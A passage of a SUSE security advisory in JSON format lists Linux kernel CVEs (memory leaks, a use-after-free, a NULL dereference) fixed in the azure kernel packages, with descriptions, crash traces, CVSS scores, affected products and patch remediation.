"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: rtl8150: fix memory leak on usb_submit_urb() failure\n\nIn async_set_registers(), when usb_submit_urb() fails, the allocated\n async_req structure and URB are not freed, causing a memory leak.\n\n The completion callback async_set_reg_cb() is responsible for freeing\n these allocations, but it is only called after the URB is successfully\n submitted and completes (successfully or with error). If submission\n fails, the callback never runs and the memory is leaked.\n\n Fix this by freeing both the URB and the request structure in the error\n path when usb_submit_urb() fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71154",
"url": "https://www.suse.com/security/cve/CVE-2025-71154"
},
{
"category": "external",
"summary": "SUSE Bug 1257163 for CVE-2025-71154",
"url": "https://bugzilla.suse.com/1257163"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71154"
},
{
"cve": "CVE-2025-71156",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71156"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngve: defer interrupt enabling until NAPI registration\n\nCurrently, interrupts are automatically enabled immediately upon\nrequest. This allows interrupt to fire before the associated NAPI\ncontext is fully initialized and cause failures like below:\n\n[ 0.946369] Call Trace:\n[ 0.946369] \u003cIRQ\u003e\n[ 0.946369] __napi_poll+0x2a/0x1e0\n[ 0.946369] net_rx_action+0x2f9/0x3f0\n[ 0.946369] handle_softirqs+0xd6/0x2c0\n[ 0.946369] ? handle_edge_irq+0xc1/0x1b0\n[ 0.946369] __irq_exit_rcu+0xc3/0xe0\n[ 0.946369] common_interrupt+0x81/0xa0\n[ 0.946369] \u003c/IRQ\u003e\n[ 0.946369] \u003cTASK\u003e\n[ 0.946369] asm_common_interrupt+0x22/0x40\n[ 0.946369] RIP: 0010:pv_native_safe_halt+0xb/0x10\n\nUse the `IRQF_NO_AUTOEN` flag when requesting interrupts to prevent auto\nenablement and explicitly enable the interrupt in NAPI initialization\npath (and disable it during NAPI teardown).\n\nThis ensures that interrupt lifecycle is strictly coupled with\nreadiness of NAPI context.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71156",
"url": "https://www.suse.com/security/cve/CVE-2025-71156"
},
{
"category": "external",
"summary": "SUSE Bug 1257167 for CVE-2025-71156",
"url": "https://bugzilla.suse.com/1257167"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71156"
},
{
"cve": "CVE-2025-71157",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71157"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/core: always drop device refcount in ib_del_sub_device_and_put()\n\nSince nldev_deldev() (introduced by commit 060c642b2ab8 (\"RDMA/nldev: Add\nsupport to add/delete a sub IB device through netlink\") grabs a reference\nusing ib_device_get_by_index() before calling ib_del_sub_device_and_put(),\nwe need to drop that reference before returning -EOPNOTSUPP error.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71157",
"url": "https://www.suse.com/security/cve/CVE-2025-71157"
},
{
"category": "external",
"summary": "SUSE Bug 1257168 for CVE-2025-71157",
"url": "https://bugzilla.suse.com/1257168"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71157"
},
{
"cve": "CVE-2025-71162",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71162"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: tegra-adma: Fix use-after-free\n\nA use-after-free bug exists in the Tegra ADMA driver when audio streams\nare terminated, particularly during XRUN conditions. The issue occurs\nwhen the DMA buffer is freed by tegra_adma_terminate_all() before the\nvchan completion tasklet finishes accessing it.\n\nThe race condition follows this sequence:\n\n 1. DMA transfer completes, triggering an interrupt that schedules the\n completion tasklet (tasklet has not executed yet)\n 2. Audio playback stops, calling tegra_adma_terminate_all() which\n frees the DMA buffer memory via kfree()\n 3. The scheduled tasklet finally executes, calling vchan_complete()\n which attempts to access the already-freed memory\n\nSince tasklets can execute at any time after being scheduled, there is\nno guarantee that the buffer will remain valid when vchan_complete()\nruns.\n\nFix this by properly synchronizing the virtual channel completion:\n - Calling vchan_terminate_vdesc() in tegra_adma_stop() to mark the\n descriptors as terminated instead of freeing the descriptor.\n - Add the callback tegra_adma_synchronize() that calls\n vchan_synchronize() which kills any pending tasklets and frees any\n terminated descriptors.\n\nCrash logs:\n[ 337.427523] BUG: KASAN: use-after-free in vchan_complete+0x124/0x3b0\n[ 337.427544] Read of size 8 at addr ffff000132055428 by task swapper/0/0\n\n[ 337.427562] Call trace:\n[ 337.427564] dump_backtrace+0x0/0x320\n[ 337.427571] show_stack+0x20/0x30\n[ 337.427575] dump_stack_lvl+0x68/0x84\n[ 337.427584] print_address_description.constprop.0+0x74/0x2b8\n[ 337.427590] kasan_report+0x1f4/0x210\n[ 337.427598] __asan_load8+0xa0/0xd0\n[ 337.427603] vchan_complete+0x124/0x3b0\n[ 337.427609] tasklet_action_common.constprop.0+0x190/0x1d0\n[ 337.427617] tasklet_action+0x30/0x40\n[ 337.427623] __do_softirq+0x1a0/0x5c4\n[ 337.427628] irq_exit+0x110/0x140\n[ 337.427633] handle_domain_irq+0xa4/0xe0\n[ 337.427640] gic_handle_irq+0x64/0x160\n[ 337.427644] call_on_irq_stack+0x20/0x4c\n[ 337.427649] do_interrupt_handler+0x7c/0x90\n[ 337.427654] el1_interrupt+0x30/0x80\n[ 337.427659] el1h_64_irq_handler+0x18/0x30\n[ 337.427663] el1h_64_irq+0x7c/0x80\n[ 337.427667] cpuidle_enter_state+0xe4/0x540\n[ 337.427674] cpuidle_enter+0x54/0x80\n[ 337.427679] do_idle+0x2e0/0x380\n[ 337.427685] cpu_startup_entry+0x2c/0x70\n[ 337.427690] rest_init+0x114/0x130\n[ 337.427695] arch_call_rest_init+0x18/0x24\n[ 337.427702] start_kernel+0x380/0x3b4\n[ 337.427706] __primary_switched+0xc0/0xc8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71162",
"url": "https://www.suse.com/security/cve/CVE-2025-71162"
},
{
"category": "external",
"summary": "SUSE Bug 1257204 for CVE-2025-71162",
"url": "https://bugzilla.suse.com/1257204"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71162"
},
{
"cve": "CVE-2025-71163",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71163"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: fix device leaks on compat bind and unbind\n\nMake sure to drop the reference taken when looking up the idxd device as\npart of the compat bind and unbind sysfs interface.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71163",
"url": "https://www.suse.com/security/cve/CVE-2025-71163"
},
{
"category": "external",
"summary": "SUSE Bug 1257215 for CVE-2025-71163",
"url": "https://bugzilla.suse.com/1257215"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71163"
},
{
"cve": "CVE-2026-22976",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22976"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset\n\n`qfq_class-\u003eleaf_qdisc-\u003eq.qlen \u003e 0` does not imply that the class\nitself is active.\n\nTwo qfq_class objects may point to the same leaf_qdisc. This happens\nwhen:\n\n1. one QFQ qdisc is attached to the dev as the root qdisc, and\n\n2. another QFQ qdisc is temporarily referenced (e.g., via qdisc_get()\n/ qdisc_put()) and is pending to be destroyed, as in function\ntc_new_tfilter.\n\nWhen packets are enqueued through the root QFQ qdisc, the shared\nleaf_qdisc-\u003eq.qlen increases. At the same time, the second QFQ\nqdisc triggers qdisc_put and qdisc_destroy: the qdisc enters\nqfq_reset() with its own q-\u003eq.qlen == 0, but its class\u0027s leaf\nqdisc-\u003eq.qlen \u003e 0. Therefore, the qfq_reset would wrongly deactivate\nan inactive aggregate and trigger a null-deref in qfq_deactivate_agg:\n\n[ 0.903172] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[ 0.903571] #PF: supervisor write access in kernel mode\n[ 0.903860] #PF: error_code(0x0002) - not-present page\n[ 0.904177] PGD 10299b067 P4D 10299b067 PUD 10299c067 PMD 0\n[ 0.904502] Oops: Oops: 0002 [#1] SMP NOPTI\n[ 0.904737] CPU: 0 UID: 0 PID: 135 Comm: exploit Not tainted 6.19.0-rc3+ #2 NONE\n[ 0.905157] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014\n[ 0.905754] RIP: 0010:qfq_deactivate_agg (include/linux/list.h:992 (discriminator 2) include/linux/list.h:1006 (discriminator 2) net/sched/sch_qfq.c:1367 (discriminator 2) net/sched/sch_qfq.c:1393 (discriminator 2))\n[ 0.906046] Code: 0f 84 4d 01 00 00 48 89 70 18 8b 4b 10 48 c7 c2 ff ff ff ff 48 8b 78 08 48 d3 e2 48 21 f2 48 2b 13 48 8b 30 48 d3 ea 8b 4b 18 0\n\nCode starting with the faulting instruction\n===========================================\n 0:\t0f 84 4d 01 00 00 \tje 0x153\n 6:\t48 89 70 18 \tmov %rsi,0x18(%rax)\n a:\t8b 4b 10 \tmov 0x10(%rbx),%ecx\n d:\t48 c7 c2 ff ff ff ff \tmov $0xffffffffffffffff,%rdx\n 14:\t48 8b 78 08 \tmov 0x8(%rax),%rdi\n 18:\t48 d3 e2 \tshl %cl,%rdx\n 1b:\t48 21 f2 \tand %rsi,%rdx\n 1e:\t48 2b 13 \tsub (%rbx),%rdx\n 21:\t48 8b 30 \tmov (%rax),%rsi\n 24:\t48 d3 ea \tshr %cl,%rdx\n 27:\t8b 4b 18 \tmov 0x18(%rbx),%ecx\n\t...\n[ 0.907095] RSP: 0018:ffffc900004a39a0 EFLAGS: 00010246\n[ 0.907368] RAX: ffff8881043a0880 RBX: ffff888102953340 RCX: 0000000000000000\n[ 0.907723] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 0.908100] RBP: ffff888102952180 R08: 0000000000000000 R09: 0000000000000000\n[ 0.908451] R10: ffff8881043a0000 R11: 0000000000000000 R12: ffff888102952000\n[ 0.908804] R13: ffff888102952180 R14: ffff8881043a0ad8 R15: ffff8881043a0880\n[ 0.909179] FS: 000000002a1a0380(0000) GS:ffff888196d8d000(0000) knlGS:0000000000000000\n[ 0.909572] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 0.909857] CR2: 0000000000000000 CR3: 0000000102993002 CR4: 0000000000772ef0\n[ 0.910247] PKRU: 55555554\n[ 0.910391] Call Trace:\n[ 0.910527] \u003cTASK\u003e\n[ 0.910638] qfq_reset_qdisc (net/sched/sch_qfq.c:357 net/sched/sch_qfq.c:1485)\n[ 0.910826] qdisc_reset (include/linux/skbuff.h:2195 include/linux/skbuff.h:2501 include/linux/skbuff.h:3424 include/linux/skbuff.h:3430 net/sched/sch_generic.c:1036)\n[ 0.911040] __qdisc_destroy (net/sched/sch_generic.c:1076)\n[ 0.911236] tc_new_tfilter (net/sched/cls_api.c:2447)\n[ 0.911447] rtnetlink_rcv_msg (net/core/rtnetlink.c:6958)\n[ 0.911663] ? __pfx_rtnetlink_rcv_msg (net/core/rtnetlink.c:6861)\n[ 0.911894] netlink_rcv_skb (net/netlink/af_netlink.c:2550)\n[ 0.912100] netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344)\n[ 0.912296] ? __alloc_skb (net/core/skbuff.c:706)\n[ 0.912484] netlink_sendmsg (net/netlink/af\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22976",
"url": "https://www.suse.com/security/cve/CVE-2026-22976"
},
{
"category": "external",
"summary": "SUSE Bug 1257035 for CVE-2026-22976",
"url": "https://bugzilla.suse.com/1257035"
